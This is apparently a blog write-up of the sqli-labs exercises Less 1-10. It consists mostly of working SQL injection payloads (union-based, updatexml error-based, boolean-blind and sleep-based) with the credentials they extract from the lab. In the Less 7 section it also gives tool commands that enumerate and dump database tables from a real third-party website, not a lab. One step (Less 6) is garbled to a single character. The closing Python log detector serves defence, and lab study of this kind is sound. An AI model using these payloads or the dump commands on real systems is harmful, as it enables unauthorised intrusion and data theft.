SQL practice: write-ups for sqli-labs Less 1-10

Copyright notice: this is the blogger's original article, released under the CC 4.0 BY-SA license; when reposting, please include a link to the original source and this notice.
Original link: https://blog.csdn.net/S123KO/article/details/100048575

SQL practice, using a server I installed myself: 127.0.0.1/sqli/Less-1

Write-ups (note when reading: for some payloads the value the page returned is appended after the payload)

Less 1

Union-based injection

Find the number of columns

?id=1' order by 4%23

?id=1' order by 3%23 (3 columns in total)

Find which columns are displayed

?id=1' and 1=2 union select 1,2,3%23

Find the database name

?id=1' and 1=2 union select 1,2,database()%23 security

?id=1' and 1=2 union select 1,database(),3%23 security

Find the table names

?id=1' and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'%23  emails,referers,uagents,users

Find the column names

?id=1' and 1=2 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name = 'users'%23 id,username,password

Find the field contents

?id=1' and 1=2 union select 1,2,group_concat(username,0x23,password)from security.users%23

Dumb#Dumb,Angelina#I-kill-you,Dummy#p@ssword,secure#crappy,stupid#stupidity,superman#genious,batman#mob!le,admin#1,admin1#admin1,admin2#admin2,admin3#admin3,dhakkan#dumbo,admin4#admin4,admin'##a

Less 2

Apart from the parameter being numeric (no quote to close), the method is the same as Less 1

?id=1 and 1=1%23

?id=1 order by 3%23

?id=1 and 1=2 union select 1,2,3%23

?id=1 and 1=2 union select 1,2,database()%23

?id=1 and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'%23  emails,less42,referers,uagents,users 

?id=1 and 1=2 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name = 'users'%23 id,username,password

?id=1 and 1=2 union select 1,2,group_concat(username,0x23,password)from security.users%23

Less 3

Error-based injection (the xpath approach, using updatexml)

?id=1')and 1=1%23

Find the database name

?id=1')and updatexml(1,concat(0x23,database()),1)%23   security

Find the table names

?id=1')and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23  emails,less42,referers,uagents

Find the column names

?id=1')and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23 id,username,password

Find the fields

?id=1')and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23 Dumb#Dumb,Angelina#I-kill-you,D

Less 4

Apart from the closing characters being "), the rest is the same as Less 3

?id=1")and 1=1%23

?id=1")and updatexml(1,concat(0x23,database()),1)%23  security

?id=1")and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23

?id=1")and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23 

?id=1")and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23

Less 5

This one only differs in the page it shows; the actual method is the same as Less 3

?id=1'and 1=1%23

Find the database name

?id=1'and updatexml(1,concat(0x23,database()),1)%23

Find the table names

?id=1'and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23

Find the column names

?id=1'and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23

Find the field contents

?id=1'and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23

Less 6

This one still uses the xpath (updatexml) approach

?id=1"and 1=1%23

Find the database name

s

Find the table names

?id=1"and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)%23

Find the column names

?id=1"and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)%23

Find the field contents

?id=1"and updatexml(1,concat(0x23,(select group_concat(username,0x23,password)from security.users)),1)%23

Less 7

This one differs from all the previous ones: the page does not echo the database name, table names and so on, so instead we blind-inject on the length and characters of the database name, table names, column names and field values

Boolean-based blind injection

?id=1'))and 1=1%23

Find the length of the database name

?id=1')) and length(database())=8%23

Find the ASCII codes of the database name, one character at a time

?id=1')) and ascii(substr(database(),1,1))=115%23   s

?id=1')) and ascii(substr(database(),2,1))=101%23   e

?id=1')) and ascii(substr(database(),3,1))=99%23     c

?id=1')) and ascii(substr(database(),4,1))=117%23    u

?id=1')) and ascii(substr(database(),5,1))=114%23    r

?id=1')) and ascii(substr(database(),6,1))=105%23    i

?id=1')) and ascii(substr(database(),7,1))=116%23    t

?id=1')) and ascii(substr(database(),8,1))=121%23    y

Find the number of tables

?id=1'))and (select count(table_name) from information_schema.tables where table_schema='security')=4%23

Find the ASCII codes of the table names

?id=1'))and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23

Find the number of columns

?id=1'))and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23

Find the ASCII codes of the column names

?id=1'))and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105%23

Find the number of records

?id=1'))and (select count(username) from security.users)=13%23

Find the field contents

?id=1'))and ascii(substr((select concat(username,0x23,password) from security.users limit 0,1),1,1))=68%23

Table names, column names and field contents are all found the same way; since blind injection is tedious, try union-based and xpath (updatexml) injection first when solving a problem

A simpler way to test is with the 小葵 tool, for example:

-u "http://www.romanianwriters.ro/s.php?id=1" --dbs

-u "http://www.romanianwriters.ro/s.php?id=1" --table -D "romanian_svc"

-u "http://www.romanianwriters.ro/s.php?id=1" --columns -T "ra_autori" -D "romanian_svc"

-u "http://www.romanianwriters.ro/s.php?id=1" --dump -C"autoportret,biografie,biografie_prev,id,nume,nume_nd" -T "ra_autori" -D "romanian_svc"

Less 8

Same method as Less 7

?id=1'and 1=1%23

Find the length of the database name

?id=1' and length(database())=8%23

Find the ASCII values of the database name

?id=1' and ascii(substr(database(),1,1))=115%23 s

?id=1' and ascii(substr(database(),2,1))=101%23 e

?id=1' and ascii(substr(database(),3,1))=99%23 c

?id=1' and ascii(substr(database(),4,1))=117%23 u

?id=1' and ascii(substr(database(),5,1))=114%23 r

?id=1' and ascii(substr(database(),6,1))=105%23 i

?id=1' and ascii(substr(database(),7,1))=116%23 t

?id=1' and ascii(substr(database(),8,1))=121%23 y

Find the number of tables

?id=1'and (select count(table_name) from information_schema.tables where table_schema='security')=4%23

Find the ASCII values of the table names

?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101%23 e

?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109%23 m

Find the number of columns

?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3%23

Less 9

Time-based blind injection (the page looks the same either way, so the delay from sleep() is the only signal)

Find the length of the database name

?id=1' and if(length(database())=8,sleep(3),1) %23

Find the ASCII codes of the database name

?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),2,1))=101,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),3,1))=99,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),4,1))=117,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),6,1))=105,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),7,1))=116,sleep(5),1)%23

?id=1' and if(ascii(substr(database(),8,1))=121,sleep(5),1)%23

Find the number of tables

?id=1'and if((select count(table_name) from information_schema.tables where table_schema='security')=4,sleep(5),1)%23

Find the number of columns

?id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3,sleep(5),1)%23

Less 10

Same method as Less 9

?id=1"and if(length(database())=8,sleep(4),1) %23

Write-ups for the remaining problems will be published later
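From the defender's side, every payload family in this write-up leaves a recognisable trace in the web server's access log: `order by N` column probes, `union select`, `updatexml(` error-based extraction, `ascii(substr(...))=N` boolean blind probes, `sleep(` time-based probes and `information_schema` look-ups. The following detector is an added example (not part of the original post or sqli-labs); the log lines are constructed and the Less paths mirror the lab URLs above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# One signature per technique covered in Less 1-10; each is matched against the
# URL-decoded, lower-cased value of every query parameter (so %23 -> '#', %27 -> "'").
SIGNATURES = {
    "column_probe":  re.compile(r"\border\s+by\s+\d+"),
    "union":         re.compile(r"\bunion\s+(all\s+)?select\b"),
    "error_xpath":   re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "boolean_blind": re.compile(r"\b(ascii|length|substr|substring)\s*\(.*\)\s*=\s*\d+"),
    "time_blind":    re.compile(r"\b(sleep|benchmark)\s*\("),
    "schema_probe":  re.compile(r"\binformation_schema\.(tables|columns)\b"),
}

# Apache/nginx combined log format: client ip ... [time] "METHOD target HTTP/x.y" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*"')

# Constructed sample log: one benign request followed by one request per technique.
SAMPLE_LOG = [
    '127.0.0.1 - - [20/Aug/2019:10:00:01 +0800] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 720',
    '127.0.0.1 - - [20/Aug/2019:10:00:02 +0800] "GET /sqli/Less-1/?id=1%27%20order%20by%203%23 HTTP/1.1" 200 720',
    '127.0.0.1 - - [20/Aug/2019:10:00:03 +0800] "GET /sqli/Less-1/?id=1%27%20and%201=2%20union%20select%201,2,group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27%23 HTTP/1.1" 200 812',
    '127.0.0.1 - - [20/Aug/2019:10:00:04 +0800] "GET /sqli/Less-5/?id=1%27and%20updatexml(1,concat(0x23,database()),1)%23 HTTP/1.1" 200 540',
    '127.0.0.1 - - [20/Aug/2019:10:00:05 +0800] "GET /sqli/Less-8/?id=1%27%20and%20ascii(substr(database(),1,1))=115%23 HTTP/1.1" 200 700',
    '127.0.0.1 - - [20/Aug/2019:10:00:06 +0800] "GET /sqli/Less-9/?id=1%27%20and%20if(length(database())=8,sleep(3),1)%20%23 HTTP/1.1" 200 700',
]

def classify(target):
    """Return the sorted list of technique labels found in any query parameter
    of `target` (the request target as logged, e.g. /sqli/Less-1/?id=...)."""
    hits = set()
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        v = value.lower()  # parse_qsl has already URL-decoded the value
        hits.update(label for label, rx in SIGNATURES.items() if rx.search(v))
    return sorted(hits)

def scan_log(lines):
    """Return (client_ip, target, techniques) for every request that matches."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed request line, skip it
        ip, _method, target = m.groups()
        techniques = classify(target)
        if techniques:
            findings.append((ip, target, techniques))
    return findings

if __name__ == "__main__":
    for ip, target, techniques in scan_log(SAMPLE_LOG):
        print(f"{ip} {','.join(techniques):28} {target}")
```

A request hitting several labels at once (for example `boolean_blind` together with `time_blind` on the Less 9 line) is the strongest signal; a single `column_probe` alone can be benign sorting and deserves correlation with follow-up requests from the same client.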
